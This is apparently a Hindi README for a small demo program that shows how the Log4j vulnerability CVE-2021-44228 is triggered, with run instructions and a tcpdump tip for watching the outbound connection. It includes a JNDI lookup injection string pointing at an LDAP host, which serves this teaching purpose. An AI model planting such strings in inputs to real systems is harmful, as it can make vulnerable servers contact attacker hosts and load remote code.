
एक सरल प्रोग्राम जो यह प्रदर्शित करता है कि Log4j भेद्यता ( CVE-2021-44228 ) का शोषण कैसे किया जा सकता है
एक सरल प्रोग्राम जो दर्शाता है कि Log4j भेद्यता का फायदा कैसे उठाया जा सकता है ( CVE-2021-44228 )
प्रोग्राम शुरू करने के लिए, बस start.sh ( UNIX सिस्टम पर ) या Windows पर start.bat चलाएँ।
उपयोगकर्ता इनपुट पढ़ा जाएगा और Log4j फ्रेमवर्क का उपयोग करके कंसोल पर लॉग किया जाएगा।
डिफ़ॉल्ट रूप से, Log4j लाइब्रेरी द्वारा उत्पन्न लॉगिंग संदेश JNDI प्रतिस्थापनों के लिए कोई सर्वर अनुपलब्ध / होस्ट नहीं मिला त्रुटियाँ प्रदान नहीं करते हैं। ( और मुझे लगता है कि यह भी एक प्रमुख कारण है कि इस भेद्यता का फायदा चुपके से उठाया जा सकता है )
सबडोमेन का उपयोग करने का भी प्रयास करें, जैसे ${jndi:ldap://test29.google.com/blah} , कभी-कभी JNDI कॉल रिमोट सर्वर से प्रतिक्रिया की प्रतीक्षा करेगा और इसीलिए प्रोग्राम ऐसा दिखता है जैसे यह अटक गया है जबकि वास्तव में इसने पृष्ठभूमि में कनेक्शन का प्रयास किया है। यदि आप ऐसे सबडोमेन का उपयोग करते हैं जो मौजूद नहीं हैं, तो JNDI कॉल कनेक्शन का प्रयास करने के बाद जल्दी से समाप्त हो जाएगा और प्रोग्राम जारी रहेगा।
मैं अनुशंसा करता हूँ कि आप प्रोग्राम को एक शेल में चलाएँ, और दूसरे शेल में समानांतर रूप से " tcpdump -i any | grep google " कमांड चलाएँ और फिर प्रोग्राम को इनपुट प्रदान करें ताकि यह देखा जा सके कि प्रोग्राम ने कनेक्शन का प्रयास किया है या नहीं।



testing ( सामान्य स्ट्रिंग )
--
--
--